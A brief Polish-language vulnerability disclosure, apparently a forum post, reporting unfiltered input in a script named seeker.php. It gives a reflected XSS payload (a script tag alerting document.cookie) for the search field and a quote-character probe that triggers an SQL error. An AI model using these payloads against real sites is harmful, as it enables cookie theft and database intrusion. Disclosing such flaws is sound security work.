Niefiltrowane zmienne w pliku:
seeker.php
XSS
w $_POST['query'] albo po prostu w polu szukaj wpisujemy:
"><script>alert(document.cookie);</script>
Ciekawostka. Błąd
sql zostanie wyświetlony jeśli np w:
$_POST['lookfor'] wpiszemy :
username'
źródło: vizzdoom :)